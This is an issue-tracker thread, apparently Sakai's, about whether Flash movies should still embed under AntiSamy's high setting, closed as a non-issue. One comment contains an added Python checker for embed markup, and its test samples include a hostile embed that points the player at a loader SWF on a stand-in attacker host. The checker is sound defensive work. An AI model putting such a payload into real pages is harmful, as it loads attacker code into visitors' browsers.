Flash movies play on High level AntiSamy

Description

I think the intent is that Flash movies should not play when AntiSamy is on its high setting.

I tried this across the following browsers: Windows 7 / IE 9, Mac OS X / Firefox, Chrome and Safari on http://qa1-nl.sakaiproject.org/portal

With all but Chrome, I get the following error, but then save anyway and the movie is embedded and plays: Alert: The embed tag contained an attribute that we could not process. The movie attribute had a value of "http://qa1-nl.sakaiproject.org/access/content/group/ace12b5d-c141-47a9-8bdb-f94c3131a2b5/barsandtone.flv". This value could not be accepted for security reasons. We have chosen to remove the entire embed tag in order to continue processing the input.

With Chrome, no error, it just inserts and plays.

Activity

Neal Caidin May 1, 2013 at 11:40 AM

1) Does the comment from mean that Flash movies are expected to work? Or in certain circumstances?

2) I don't know about the local browser plug-in issue. I just tested on IE 9 on Windows 7 and I get the same results as Firefox/Mac

<p>
<object data="/library/editor/ckextraplugins/movieplayer/StrobeMediaPlayback.swf" height="240" id="movie451866" type="application/x-shockwave-flash" width="320"><param name="movie" value="http://qa1-nl.sakaiproject.org/access/content/group/ace12b5d-c141-47a9-8bdb-f94c3131a2b5/barsandtone.flv" /><param name="FlashVars" value="src=http://qa1-nl.sakaiproject.org/access/content/group/ace12b5d-c141-47a9-8bdb-f94c3131a2b5/barsandtone.flv&amp;showplayer=always&amp;width=320&amp;height=240&amp;showiconplay=true&amp;autoplay=0" /><param name="allowFullScreen" value="true" /></object></p>

<p>
<object data="/library/editor/ckextraplugins/movieplayer/StrobeMediaPlayback.swf" height="240" id="movie451866" type="application/x-shockwave-flash" width="320"><param name="FlashVars" value="src=http://qa1-nl.sakaiproject.org/access/content/group/ace12b5d-c141-47a9-8bdb-f94c3131a2b5/barsandtone.flv&amp;showplayer=always&amp;width=320&amp;height=240&amp;showiconplay=true&amp;autoplay=0" /><param name="allowFullScreen" value="true" /></object></p>

Sam Ottenhoff May 1, 2013 at 11:39 AM

> Sam: My understanding was that it was a safe SWF file that would only load up user-supplied media. I don't
> see how that SWF would be exploited unless it (wrongly) loads up any old SWF

This is correct. The StrobeMediaPlayback SWF file is trusted and is responsible for loading untrusted end-user media (mp4, flv, etc) from any location.

Aaron Zeckoski May 1, 2013 at 11:33 AM

NOTE: I think the movie attribute is being somehow inserted by the browser itself... I don't see this in my testing though. Perhaps this is caused by a local browser plugin?

Aaron Zeckoski May 1, 2013 at 11:30 AM

OK, I realize what this is referring to now.
From

AZ: /library/editor/ckextraplugins/movieplayer/StrobeMediaPlayback.swf allows anything to be embedded

Sam: My understanding was that it was a safe SWF file that would only load up user-supplied media. I don't see how that SWF would be exploited unless it (wrongly) loads up any old SWF

The agreement was that when you are embedding using the video link in the editor (which always uses the technique I mentioned) that you are accepting that risk and trusting the StrobeMediaPlayback library. Users who are uncomfortable with that would need to customize the antisamy rules to block it AND disable the ckeditor movie button.

This matches legacy behavior.
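The trust model Sam and Aaron describe (the StrobeMediaPlayback SWF is trusted; the media URL it is handed via FlashVars is not, and the danger would be that player loading "any old SWF") can be stated as a concrete post-sanitisation check. The following is an added example, not Sakai, CKEditor or AntiSamy code. It assumes the site host, the trusted player path, the allowed media prefix and the allowed media extensions shown as constants (none of which the issue fixes as policy), and its sample markup is constructed from the two `<object>` elements pasted in the comments plus one hostile variant written for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Assumptions for this example, not settings taken from Sakai's AntiSamy policy.
TRUSTED_PLAYER = "/library/editor/ckextraplugins/movieplayer/StrobeMediaPlayback.swf"
SITE_HOST = "qa1-nl.sakaiproject.org"
ALLOWED_MEDIA_PREFIX = "/access/content/"
ALLOWED_MEDIA_EXT = (".flv", ".mp4", ".f4v", ".mp3")


class _ObjectCollector(HTMLParser):
    """Collect every <object> (with its nested <param> name/value pairs) and every <embed>."""

    def __init__(self):
        super().__init__()
        self.objects = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # HTMLParser already unescapes &amp; inside attribute values
        if tag == "object":
            self._current = {"attrs": attrs, "params": {}, "embed": False}
            self.objects.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][attrs.get("name", "")] = attrs.get("value", "")
        elif tag == "embed":
            # The alert quoted in the issue shows AntiSamy dropping <embed> outright.
            self.objects.append({"attrs": attrs, "params": {}, "embed": True})

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None


def check_media_source(src):
    """Problems with a FlashVars src URL; an empty list means the media URL is acceptable."""
    problems = []
    u = urlsplit(src)
    if u.scheme not in ("http", "https") or u.hostname != SITE_HOST:
        problems.append(f"media host is not this site: {src}")
    if not u.path.startswith(ALLOWED_MEDIA_PREFIX):
        problems.append(f"media path outside {ALLOWED_MEDIA_PREFIX}: {u.path}")
    if not u.path.lower().endswith(ALLOWED_MEDIA_EXT):
        # A .swf here is exactly the "loads up any old SWF" case the thread worries about.
        problems.append(f"media extension not allowed: {u.path}")
    return problems


def check_movie_embed(html):
    """Return every violation found in editor-produced movie markup (empty list = clean)."""
    collector = _ObjectCollector()
    collector.feed(html)
    problems = []
    for obj in collector.objects:
        if obj["embed"]:
            problems.append("<embed> tag is not accepted")
            continue
        attrs, params = obj["attrs"], obj["params"]
        if attrs.get("data") != TRUSTED_PLAYER:
            problems.append(f"object data is not the trusted player: {attrs.get('data')}")
        if attrs.get("type") != "application/x-shockwave-flash":
            problems.append(f"unexpected object type: {attrs.get('type')}")
        if "movie" in params:
            # Mirrors the AntiSamy alert in the issue, which rejected the movie value.
            problems.append("movie param is not accepted")
        srcs = parse_qs(params.get("FlashVars", "")).get("src", [])
        if len(srcs) != 1:
            problems.append("FlashVars must carry exactly one src")
        for src in srcs:
            problems.extend(check_media_source(src))
    return problems


# Constructed samples: the first two are the markup pasted in the issue, the third is hostile.
MEDIA = ("http://qa1-nl.sakaiproject.org/access/content/group/"
         "ace12b5d-c141-47a9-8bdb-f94c3131a2b5/barsandtone.flv")
FLASHVARS = f"src={MEDIA}&amp;showplayer=always&amp;width=320&amp;height=240&amp;showiconplay=true&amp;autoplay=0"
OBJECT_OPEN = (f'<object data="{TRUSTED_PLAYER}" height="240" id="movie451866" '
               'type="application/x-shockwave-flash" width="320">')
CLEAN_EMBED = (f'<p>{OBJECT_OPEN}<param name="FlashVars" value="{FLASHVARS}" />'
               '<param name="allowFullScreen" value="true" /></object></p>')
EMBED_WITH_MOVIE_PARAM = (f'<p>{OBJECT_OPEN}<param name="movie" value="{MEDIA}" />'
                          f'<param name="FlashVars" value="{FLASHVARS}" />'
                          '<param name="allowFullScreen" value="true" /></object></p>')
HOSTILE_EMBED = (f'<p>{OBJECT_OPEN}<param name="FlashVars" '
                 'value="src=http://evil.example/loader.swf&amp;autoplay=1" /></object></p>')

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN_EMBED), ("movie param", EMBED_WITH_MOVIE_PARAM),
                         ("hostile", HOSTILE_EMBED)):
        print(name, check_movie_embed(sample) or "OK")
```

The check deliberately keys on the `data` attribute rather than on the `type`: the sanitizer allowing `application/x-shockwave-flash` is what lets the trusted player in, so the path of the SWF actually loaded is the thing a site that accepts this risk still has to pin down, and the FlashVars `src` is the only untrusted input that reaches it.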

Neal Caidin May 1, 2013 at 11:16 AM

After saving (clicking Post Announcement again) the html source is : <p>
<object data="/library/editor/ckextraplugins/movieplayer/StrobeMediaPlayback.swf" height="240" id="movie987947" type="application/x-shockwave-flash" width="320"><param name="FlashVars" value="src=http://qa1-nl.sakaiproject.org/access/content/group/ace12b5d-c141-47a9-8bdb-f94c3131a2b5/barsandtone.flv&amp;showplayer=always&amp;width=320&amp;height=240&amp;showiconplay=true&amp;autoplay=0" /><param name="allowFullScreen" value="true" /></object></p>

and the movie plays fine.

Non-Issue

Details

Created May 1, 2013 at 10:18 AM
Updated April 25, 2018 at 3:19 PM
Resolved May 1, 2013 at 11:30 AM